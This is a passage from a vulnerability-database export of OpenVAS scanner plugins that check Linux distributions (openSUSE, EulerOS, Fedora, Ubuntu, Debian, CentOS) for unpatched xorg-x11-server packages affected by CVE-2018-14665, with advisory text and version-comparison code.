"http://plugins.openvas.org/nasl.php?oid=1361412562310852126", "type": "openvas", "title": "openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2018:3800-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852126\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-17 06:15:25 +0100 (Sat, 17 Nov 2018)\");\n script_name(\"openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2018:3800-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3800-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-11/msg00022.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the openSUSE-SU-2018:3800-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xorg-x11-server fixes the following issues:\n\n - CVE-2018-14665: Disable -logfile and -modulepath when running with\n elevated privileges (bsc#1112020,\n\n Note that SUSE by default does not run with elevated privileges, so the\n default installation is not affected by this problem.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1420=1\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.19.6~lp150.7.3.1\", 
rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-debugsource\", rpm:\"xorg-x11-server-debugsource~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra\", rpm:\"xorg-x11-server-extra~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra-debuginfo\", rpm:\"xorg-x11-server-extra-debuginfo~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-sdk\", rpm:\"xorg-x11-server-sdk~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-wayland\", rpm:\"xorg-x11-server-wayland~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-wayland-debuginfo\", rpm:\"xorg-x11-server-wayland-debuginfo~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192123", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2123)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions 
are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2123\");\n script_version(\"2020-01-23T12:35:14+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:35:14 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:35:14 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2123)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2123\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2123\");\n\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2019-2123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xwayland\", rpm:\"xorg-x11-server-Xwayland~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n 
report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310876007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876007", "type": "openvas", "title": "Fedora Update for xorg-x11-server FEDORA-2018-4ab08fedd6", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876007\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:31:33 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for xorg-x11-server FEDORA-2018-4ab08fedd6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2018-4ab08fedd6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LJPSML4VDX7NY7N7NYQTBAOKMOMGUALW\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the FEDORA-2018-4ab08fedd6 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"X.Org X11 X server\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.20.3~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-11-08T00:00:00", "id": "OPENVAS:1361412562310875244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875244", "type": "openvas", "title": "Fedora Update for xorg-x11-server FEDORA-2018-839720583a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_839720583a_xorg-x11-server_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xorg-x11-server FEDORA-2018-839720583a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875244\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-08 06:37:09 +0100 (Thu, 08 Nov 2018)\");\n script_name(\"Fedora Update for xorg-x11-server FEDORA-2018-839720583a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-839720583a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZSWEOYODBNWRD3QJXBCSBR7SFXPFM3D\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the FEDORA-2018-839720583a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.19.6~10.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-27T00:00:00", "id": "OPENVAS:1361412562310843800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843800", "type": "openvas", "title": "Ubuntu Update for xorg-server USN-3802-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3802_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for xorg-server USN-3802-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843800\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-27 06:24:24 +0200 (Sat, 27 Oct 2018)\");\n script_name(\"Ubuntu Update for xorg-server USN-3802-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|18\\.10|16\\.04 LTS)\");\n\n\n script_xref(name:\"USN\", value:\"3802-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3802-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-server'\n package(s) announced via the USN-3802-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. 
When certain graphics drivers are being used, a local attacker\ncould possibly use this issue to overwrite arbitrary files and escalate\nprivileges.\");\n\n script_tag(name:\"affected\", value:\"xorg-server on Ubuntu 18.10,\n Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core\", ver:\"2:1.19.6-1ubuntu4.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core\", ver:\"2:1.20.1-3ubuntu2.1\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core-hwe-16.04\", ver:\"2:1.19.6-1ubuntu4.1~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-04T18:56:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "Narendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitrary file overwrite,\nwhich can result in privilege escalation.", "modified": "2019-07-04T00:00:00", "published": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310704328", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704328", "type": "openvas", "title": "Debian Security Advisory DSA 
4328-1 (xorg-server - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4328-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704328\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_name(\"Debian Security Advisory DSA 4328-1 (xorg-server - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-25 00:00:00 +0200 (Thu, 25 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", 
value:\"https://www.debian.org/security/2018/dsa-4328.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xorg-server on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 2:1.19.2-1+deb9u4.\n\nWe recommend that you upgrade your xorg-server packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/xorg-server\");\n script_tag(name:\"summary\", value:\"Narendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitrary file overwrite,\nwhich can result in privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"xdmx\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xdmx-tools\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xnest\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xorg-server-source\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-common\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xephyr\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-core\", 
ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-dev\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-legacy\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xvfb\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xwayland\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-08T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310882986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882986", "type": "openvas", "title": "CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id$\n#\n# CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882986\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:38:56 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2018:3410\");\n script_xref(name:\"URL\", 